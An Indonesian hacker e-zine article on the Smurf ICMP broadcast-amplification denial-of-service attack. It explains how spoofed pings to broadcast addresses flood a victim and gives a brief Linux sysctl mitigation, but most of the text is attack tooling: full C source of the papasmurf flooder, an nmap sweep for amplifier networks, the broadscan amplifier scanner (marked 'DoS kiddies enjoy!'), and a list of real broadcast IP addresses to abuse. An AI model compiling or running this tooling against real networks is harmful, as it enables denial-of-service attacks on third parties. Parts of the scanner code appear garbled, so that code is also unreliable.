Terbitan Online Kecoak Elektronik http://k-elektronik.org ======================================================================== SMURF ATTACK Oleh: SaMuRai_HaCk (Kecoak Elektronik) ======================================================================== ------------ Pendahuluan ------------ Tentunya kita sudah sering mendengar tentang DOS (denial-of-service) ingin saya bahas adalah tentang fenomena SMURF attack yang lumayan seru, soalnya dengan modal modem 56kbps kita bisa bikin crash koneksi ADSL,Cablevision access, dan laennya selama masih dibawah T3.. kalau udah ini nyerah aja dech :) kenapa smurf? smurf adalah suatu program yang digunakan dalam teknik DOS ini, maka dari itu nama serangannya smurf. Smurf sebenarnya adalah serangan DOS yang menggunakan ICMP echo dan mempunyai kemiripan serangan dengan "fraggle". ------------ Bahan Bahan ------------ 1. Windows OS a. koneksi internet b. program winsmurf (ini cari sendiri ach) c. list broadcast (ada attachmentnya dibawah tapi cuman dikit dan ngga jamin masih idup yach) d. sedikit pengetahuan ttg bahasa inggris :) e. target ( ini ngga mutlak! jangan dipake buat isengin orang) 2. Linux OS (belom coba di varian laennya dari UNIX) <- lebih mantap nih! a. Shell (udah pasti ke install lah) b. Script smurf.c (ada dibawah) c. Scanner Broadcast server (kita pake nmap aja yach...) d. Kelengkapan untuk complie *.c (gcc aja udah cukup) e. Koneksi Internet f. tambahin sendiri ----------- Cara Kerja ----------- smurf bekerja dimulai dari sebuah serangan yang mengirimkan 'aliran' data ke Internet Control Message Protocol (ICMP), atau ping -paket yang dipake buat ngecek apakah sebuah server itu idup atau ngga-. Dimana server yang dimintai keterangan adalah server dengan open broadcast yang membawahi subnetwork dibawahnya yang merupakan satu grup *.255. Gampangnya gini..kalau tuh broadcast server di 'ping' maka yang merespon adalah SEMUA grup dari server itu. Nah..teknik ini digabungkan dengan spoffing ip...jadi kita mem'ping' broadcast server menggunakan ip dari target kita, sehingga respon dari broadcast + networknya akan di'lapor'kan ke alamat target kita. Sebagai contoh..saya menggunakan Cablevision access yang katanya sih 64kbps (kalau di cek ngga pernah tuh sampe segitu heuheuhe) berarti 42 64-byte ping paket bisa terkirim tiap detiknya kalau sepenuhnya diterima oleh broadcast server ini bisa menjadi 10,626 paket, atau sekitar 5.2Mbits data perdetik..bayangin tuh! dengan keadaan ini maka target dengan koneksi T1 akan crash!! --------------- SKEMA SERANGAN --------------- seluruh broadcast yang menerima spoof ping dari target akan |---------| |----------------| me-reply ping tersebut |-------| |Penyerang|---spoofing-- > |Broadcast server|------ bayangkan berapa banyak -|target | |---------| |----------------| server yang merespon :) |-------| | | | | | | 202.153.253.** Menerima Ping untuk xxx.xxx.xxx.255 63.149.**.***(crash) dari 63.149.**.*** | | |----------|----------|----------|----------| Broadcast Broadcast Broadcast Broadcast Broadcast network network network network network | | |----------|----------|----------|----------| Broadcast Broadcast Broadcast Broadcast Broadcast network network network network network --------- SOLUSI --------- Sampai artikel ini diturunkan, secara teknis smurf attack ini belom bisa di atasi dari pihak target dengan cara mempatch software anda..lah? terus gimana? ehm..dari pihak server sih mungkin bisa...ini adalah solusi untuk server server gede agar tidak mengizinkan adanya ping boardcast.. cara yang saya berikan dibawah ini didapat digunakan diserver yang menggunakan operation system linux (belom dicoba ke server dengan OS laen) dengan cara mengaktifkan 'icmp_echo_ignore_broadcasts' dengan cara mengubah valuenya menjadi '1' file ini adanya di /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts berarti commandnya # echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts atau edit file /etc/sysctl.conf dan mengubah value menjadi '1' net.ipv4.icmp_echo_ignore_broadcasts = 1 <- valuenya jadi '1' lalu gunakan command # sysctl -w (untuk menjalankan perubahan yang sudah dilakukan) ya..saya cuman bisa kasih saran itu ke system admin..keamanan adalah ditangan anda, dan satu hal yang paling penting...JANGAN PERNAH MELAKUKAN PERBUATAN YANG MERUGIKAN ORANG LAEN!!! demikian sedikit tulisan dari sayah terimakasih untuk semua yang sudah membantu sayah, tidak lupa saya minta saran dan kritiknya terutama mengenai cara cara mengatasi smurf pada server server lainnya. Juga solusi atas serangan ini untuk sisi client karna firewall saja tidak cukup! terimakasih. SaMuRai_HaCK ---------- ATTACHMENT ---------- papasmurf.c ----- mulai dari bawah sini ------ /* * (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com * * A year ago today I made what remains the questionable decision of * releasing my program 'smurf', a program which uses broadcast "amplifiers" * to turn an icmp flood into an icmp holocaust, into the hands of packet * monkeys, script kiddies and all round clueless idiots alike. Nine months * following, a second program 'fraggle', smurfs udp cousin, was introducted * into their Denial of Service orgy. This brings us to today, July 28, * 1998, one year after my first "mistake". The result, proof that history * does repeat itself and a hybrid of the original programs. * * First may I say that I in no way take credit for "discovering" this. * There is no doubt in my mind that this idea was invisioned long before * I was even sperm -- I merely decided to do something about it. Secondly, * if you want to hold me personally responsible for turning the internet * into a larger sesspool of crap than it already is, then may I take this * opportunity to deliver to you a message of the utmost importance -- "Fuck * you". If I didn't write it, someone else would have. * * I must admit that there really is no security value for me releasing this * new version. In fact, my goals for the version are quite silly. First, * I didn't like the way my old code looked, it was ugly to look at and it * did some stupid unoptimized things. Second, it's smurfs one year * birthday -- Since I highly doubt anyone would have bought it a cake, I * thought I would do something "special" to commemorate the day. * * Hmm, I am starting to see why I am known for my headers (wage eats * playdough!). * * Well, I guess this wouldn't be the same if I did not include some sort * of shoutouts, so here goes... * * A hearty handshake to... * * o MSofty, pbug, Kain -- No matter which path each of you decides to * take in the future, I will always look back upon these days as one * of the most enjoyable, memorable and thought-provoking experiences * of my life. I have nothing but the highest degree of respect for * each of you, and I value your friendship immensely. Here's to * living, learning and laughing -- Cheers gentlemen. --Dan * o Hi JoJo! * o morbid and his grandam barbiegirl gino styles, yo. * o The old #havok crew. * o Pharos,silph,chris@unix.org,Viola,Vonne,Dianora,fyber,silitek, * brightmn,Craig Huegen,Dakal,Col_Rebel,Rick the Temp,jenni`,Paige, * RedFemme,nici,everlast,and everyone else I know and love. * * A hearty enema using 15.0mol/L HCl to... * * o #Conflict. Perhaps you are just my scapegoat of agression, but you * all really need to stop flooding efnet servers/taking over irc * channels/mass owning networks running old qpoppers and get a * fucking life. * o BR. It wouldn't be the same without you in here, but to be honest * you really aren't worth the space in the already way-to-bloated * header, nor the creative energy of me coming up with an intricate * bash that you will never understand anyway. Shrug, hatred disguises * itself as apathy with time. * * I feel like I'm writing a fucking essay here... * * To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish. * or just * "gcc -o smurf5 papasmurf.c" if your BSDish. * * Old linux kernels won't have BSD header support, so this may not compile. * If you wish a linux-only version, do it yourself, or mail * tfreak@jaded.net, and I might lend you mine. * * And most importantly, please don't abuse this. If you are going to do * anything with this code, learn from it. * * I remain, * * TFreak. * */ /* End of Hideously Long Header */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef LINUX #define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */ #ifndef _USE_BSD #define _USE_BSD #endif #endif #include #include #include #ifdef LINUX #define FIX(n) htons(n) #else #define FIX(n) (n) #endif struct smurf_t { struct sockaddr_in sin; /* socket prot structure */ int s; /* socket */ int udp, icmp; /* icmp, udp booleans */ int rnd; /* Random dst port boolean */ int psize; /* packet size */ int num; /* number of packets to send */ int delay; /* delay between (in ms) */ u_short dstport[25+1]; /* dest port array (udp) */ u_short srcport; /* source port (udp) */ char *padding; /* junk data */ }; /* function prototypes */ void usage (char *); u_long resolve (char *); void getports (struct smurf_t *, char *); void smurficmp (struct smurf_t *, u_long); void smurfudp (struct smurf_t *, u_long, int); u_short in_chksum (u_short *, int); int main (int argc, char *argv[]) { struct smurf_t sm; struct stat st; u_long bcast[1024]; char buf[32]; int c, fd, n, cycle, num = 0, on = 1; FILE *bcastfile; /* shameless self promotion banner */ fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n"); if (argc < 3) usage(argv[0]); /* set defaults */ memset((struct smurf_t *) &sm, 0, sizeof(sm)); sm.icmp = 1; sm.psize = 64; sm.num = 0; sm.delay = 10000; sm.sin.sin_port = htons(0); sm.sin.sin_family = AF_INET; sm.srcport = 0; sm.dstport[0] = 7; /* resolve 'source' host, quit on error */ sm.sin.sin_addr.s_addr = resolve(argv[1]); /* open the broadcast file */ if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("Opening broadcast file"); exit(-1); } /* parse out options */ optind = 3; while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1) { switch (c) { /* random dest ports */ case 'r': sm.rnd = 1; break; /* random src/dest ports */ case 'R': sm.rnd = 1; sm.srcport = 0; break; /* number of packets to send */ case 'n': sm.num = atoi(optarg); break; /* usleep between packets (in ms) */ case 'd': sm.delay = atoi(optarg); break; /* multiple ports */ case 'p': if (strchr(optarg, ',')) getports(&sm, optarg); else sm.dstport[0] = (u_short) atoi(optarg); break; /* specify protocol */ case 'P': if (strcmp(optarg, "icmp") == 0) { /* this is redundant */ sm.icmp = 1; break; } if (strcmp(optarg, "udp") == 0) { sm.icmp = 0; sm.udp = 1; break; } if (strcmp(optarg, "both") == 0) { sm.icmp = 1; sm.udp = 1; break; } puts("Error: Protocol must be icmp, udp or both"); exit(-1); /* source port */ case 's': sm.srcport = (u_short) atoi(optarg); break; /* specify packet size */ case 'S': sm.psize = atoi(optarg); break; /* filename to read padding in from */ case 'f': /* open and stat */ if ((fd = open(optarg, O_RDONLY)) == -1) { perror("Opening packet data file"); exit(-1); } if (fstat(fd, &st) == -1) { perror("fstat()"); exit(-1); } /* malloc and read */ sm.padding = (char *) malloc(st.st_size); if (read(fd, sm.padding, st.st_size) < st.st_size) { perror("read()"); exit(-1); } sm.psize = st.st_size; close(fd); break; default: usage(argv[0]); } } /* end getopt() loop */ /* create packet padding if neccessary */ if (!sm.padding) { sm.padding = (char *) malloc(sm.psize); memset(sm.padding, 0, sm.psize); } /* create the raw socket */ if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { perror("Creating raw socket (are you root?)"); exit(-1); } /* Include IP headers ourself (thanks anyway though) */ if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt()"); exit(-1); } /* read in our broadcasts and store them in our array */ while (fgets(buf, sizeof buf, bcastfile) != NULL) { char *p; int valid; /* skip over comments/blank lines */ if (buf[0] == '#' || buf[0] == '\n') continue; /* get rid of newline */ buf[strlen(buf) - 1] = '\0'; /* check for valid address */ for (p = buf, valid = 1; *p != '\0'; p++) { if ( ! isdigit(*p) && *p != '.' ) { fprintf(stderr, "Skipping invalid ip %s\n", buf); valid = 0; break; } } /* if valid address, copy to our array */ if (valid) { bcast[num] = inet_addr(buf); num++; if (num == 1024) break; } } /* end bcast while loop */ /* seed our random function */ srand(time(NULL) * getpid()); /* wee.. */ for (n = 0, cycle = 0; n < sm.num || !sm.num; n++) { if (sm.icmp) smurficmp(&sm, bcast[cycle]); if (sm.udp) { int x; for (x = 0; sm.dstport[x] != 0; x++) smurfudp(&sm, bcast[cycle], x); } /* quick nap */ usleep(sm.delay); /* cosmetic psychadelic dots */ if (n % 50 == 0) { printf("."); fflush(stdout); } cycle = (cycle + 1) % num; } exit(0); } void usage (char *s) { fprintf(stderr, "usage: %s [options]\n" "\n" "Options\n" "-p: Comma separated list of dest ports (default 7)\n" "-r: Use random dest ports\n" "-R: Use random src/dest ports\n" "-s: Source port (0 for random (default))\n" "-P: Protocols to use. Either icmp, udp or both\n" "-S: Packet size in bytes (default 64)\n" "-f: Filename containg packet data (not needed)\n" "-n: Num of packets to send (0 is continuous (default))\n" "-d: Delay inbetween packets (in ms) (default 10000)\n" "\n", s); exit(-1); } u_long resolve (char *host) { struct in_addr in; struct hostent *he; /* try ip first */ if ((in.s_addr = inet_addr(host)) == -1) { /* nope, try it as a fqdn */ if ((he = gethostbyname(host)) == NULL) { /* can't resolve, bye. */ herror("Resolving victim host"); exit(-1); } memcpy( (caddr_t) &in, he->h_addr, he->h_length); } return(in.s_addr); } void getports (struct smurf_t *sm, char *p) { char tmpbuf[16]; int n, i; for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++) { if (*p == ',') { tmpbuf[i] = '\0'; sm->dstport[n] = (u_short) atoi(tmpbuf); n++; i = -1; continue; } tmpbuf[i] = *p; } tmpbuf[i] = '\0'; sm->dstport[n] = (u_short) atoi(tmpbuf); sm->dstport[n + 1] = 0; } void smurficmp (struct smurf_t *sm, u_long dst) { struct ip *ip; struct icmp *icmp; char *packet; int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize; packet = malloc(pktsize); ip = (struct ip *) packet; icmp = (struct icmp *) (packet + sizeof(struct ip)); memset(packet, 0, pktsize); /* fill in IP header */ ip->ip_v = 4; ip->ip_hl = 5; ip->ip_tos = 0; ip->ip_len = FIX(pktsize); ip->ip_ttl = 255; ip->ip_off = 0; ip->ip_id = FIX( getpid() ); ip->ip_p = IPPROTO_ICMP; ip->ip_sum = 0; ip->ip_src.s_addr = sm->sin.sin_addr.s_addr; ip->ip_dst.s_addr = dst; /* fill in ICMP header */ icmp->icmp_type = ICMP_ECHO; icmp->icmp_code = 0; icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); /* thx griffin */ /* send it on its way */ if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin, sizeof(struct sockaddr)) == -1) { perror("sendto()"); exit(-1); } free(packet); /* free willy! */ } void smurfudp (struct smurf_t *sm, u_long dst, int n) { struct ip *ip; struct udphdr *udp; char *packet, *data; int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize; packet = (char *) malloc(pktsize); ip = (struct ip *) packet; udp = (struct udphdr *) (packet + sizeof(struct ip)); data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr)); memset(packet, 0, pktsize); if (*sm->padding) memcpy((char *)data, sm->padding, sm->psize); /* fill in IP header */ ip->ip_v = 4; ip->ip_hl = 5; ip->ip_tos = 0; ip->ip_len = FIX(pktsize); ip->ip_ttl = 255; ip->ip_off = 0; ip->ip_id = FIX( getpid() ); ip->ip_p = IPPROTO_UDP; ip->ip_sum = 0; ip->ip_src.s_addr = sm->sin.sin_addr.s_addr; ip->ip_dst.s_addr = dst; /* fill in UDP header */ if (sm->srcport) udp->uh_sport = htons(sm->srcport); else udp->uh_sport = htons(rand()); if (sm->rnd) udp->uh_dport = htons(rand()); else udp->uh_dport = htons(sm->dstport[n]); udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize); // udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp)); /* send it on its way */ if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin, sizeof(struct sockaddr)) == -1) { perror("sendto()"); exit(-1); } free(packet); /* free willy! */ } u_short in_chksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /* EOF */ ---- selsai ----- berikut ini adalah cara mencari ip broadcast menggunakan tools yang sudah tidak asing lagi yaitu NMAP :) commandnya : nmap -n -sP -PI -o smurf.log 'xxx.12.*.0,63,64,127,128,191,192,255' catatan : hanya *.255 yang bisa digunakan untuk smurf attack file broadcast tersimpan di smurf.log terus bisa dipilih dan di bikin file baru buat input di papasmurf.c ini file broadscan.c bisa juga dipake buat nyari broadcast server -- tarik maaaanggg ---- /* Broadscan v 0.31 DUP Broadcast IP scanner by Vacuum http://www.technotronic.com 09-03-98 This is a very lame scanner written to stop people from asking how to find DUP broadcast ip addresses. Use this in conjunction with smurf, fraggle, or papasmurf. DoS kiddies enjoy! */ #include #include #define DEBUG 1 FILE *stream; void pingz0r(int first, int second, int start, int end) { int counter,flag; FILE *stream; char tempstring[2048]; char parse[2048]; for (counter=start; counter /dev/null",first, second, counter); stream=popen(tempstring,"r"); while (fgets(parse,sizeof(parse),stream)!=NULL) { if (DEBUG) printf("Results:%s",parse); if (strstr(parse,"DUP")) { flag=1; fclose(stream); break; } } if (flag==1) stream=fopen("broadcast.txt", "a"); fprintf(stream, "%d.%d.%d.255\n",first,second,counter); fclose( stream); } } main(int argc, char *argv[]) { int first,second; if (argc!=3) { printf("\nusage : %s \n\n",argv[0]); exit(0); } first=atoi(argv[1]); second=atoi(argv[2]); if (first==127) { printf("%d is a localhost. You have no clue or are trying to break this program",first); exit(0); } if (first>254 || first <0) { printf("First octet is: %d. It must be between <1-254>",first); exit(0); } if (second>254 || second<0) { printf("Second octet is: %d. It must be <1-254>",second); exit(0); } printf("Scanning for DUP broadcast ip addresses\n"); printf("Results output to broadcast.txt\n"); if (fork()!=0) pingz0r(first,second,0,128); else pingz0r(first,second,128,255); } -- tahan -- kalau emang nih alamat masih berfungsi ya bersyukurlah... 63.84.239.255 213.11.125.255 216.178.13.255 211.51.149.255 210.243.206.255 udah ach...ntar kebanyakan lagi..ck ck ck